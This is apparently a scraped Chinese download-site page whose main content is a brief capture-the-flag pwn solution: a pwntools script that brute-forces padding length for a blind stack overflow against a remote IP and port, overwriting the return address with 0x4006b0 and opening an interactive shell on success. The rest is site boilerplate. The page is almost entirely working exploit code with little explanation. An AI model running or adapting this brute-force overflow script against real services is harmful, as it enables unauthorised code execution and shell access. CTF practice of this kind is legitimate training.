题目并没有提供二进制文件进行分析,采用暴力破解方式
from pwn import * import threading
#context(os='linux', arch='i386', log_level='debug')
def find():
print("thread %s is running..."%threading.current_thread().name)
n=0x0
while n<0x400:
n=n+1
print("thread %s>>>%s"%(threading.current_thread().name,n))
sh=remote("220.249.52.134",53525)
payload=p8(0x11)*n+p64(0x4006b0)
sh.sendlineafter(">",payload)
try:
sh.recvline()
print("repeat time is %x"%n)
sh.interactive()
break
except EOFError:
continue
if __name__ =='__main__':
t1=threading.Thread(target=find)
t1.start()
t1.join()
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论


格式:docx 资源大小:4.1MB 页数:35




























收起资源包目录





共 1 条
- 1
资源评论


YOLO数据集工作室
- 粉丝: 974
上传资源 快速赚钱
我的内容管理 展开
我的资源 快来上传第一个资源
我的收益
登录查看自己的收益我的积分 登录查看自己的积分
我的C币 登录后查看C币余额
我的收藏
我的下载
下载帮助


最新资源
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈



安全验证
文档复制为VIP权益,开通VIP直接复制
